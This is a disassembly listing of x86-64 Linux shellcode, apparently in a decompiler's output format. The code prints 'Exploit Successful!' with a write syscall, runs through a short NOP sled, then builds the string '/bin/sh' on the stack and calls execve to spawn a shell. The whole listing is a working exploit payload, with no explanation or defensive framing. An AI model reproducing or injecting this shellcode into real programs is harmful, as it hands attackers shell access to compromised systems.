00000000 488bec mov rbp, rsp {__return_addr}
00000003 4c8d0d12000000 lea r9, [rel data_1c] {"Exploit Successful!\n"}
0000000a 498d31 lea rsi, [r9] {data_1c, "Exploit Successful!\n"}
0000000d 6a01 push data_0+1 {var_8}
0000000f 58 pop rax {var_8} {data_0+1}
00000010 33ff xor edi, edi {sub_0}
00000012 6a14 push data_14 {var_8}
00000014 5a pop rdx {var_8} {data_14}
00000015 0f05 syscall ; write(1, "Exploit Successful!\n", 0x14)
00000017 e915000000 jmp sub_31
0000001c char data_1c[0x15] = "Exploit Successful!\n", 0
00000031 90 nop
00000032 90 nop
00000033 90 nop
00000034 90 nop
00000035 4831c0 xor rax, rax {sub_0}
00000038 4831d2 xor rdx, rdx {sub_0}
0000003b 48bb2f2f62696e2f…mov rbx, 0x68732f6e69622f2f
00000045 48c1eb08 shr rbx, 0x8 {0x68732f6e69622f}
00000049 53 push rbx {var_8} {0x68732f6e69622f}
0000004a 4889e7 mov rdi, rsp {var_8}
0000004d 50 push rax {var_10} {sub_0}
0000004e 57 push rdi {var_8} {var_18}
0000004f 4889e6 mov rsi, rsp {var_18}
00000052 b03b mov al, 0x3b
00000054 0f05 syscall ; execve("/bin/sh", ["/bin/sh"], NULL)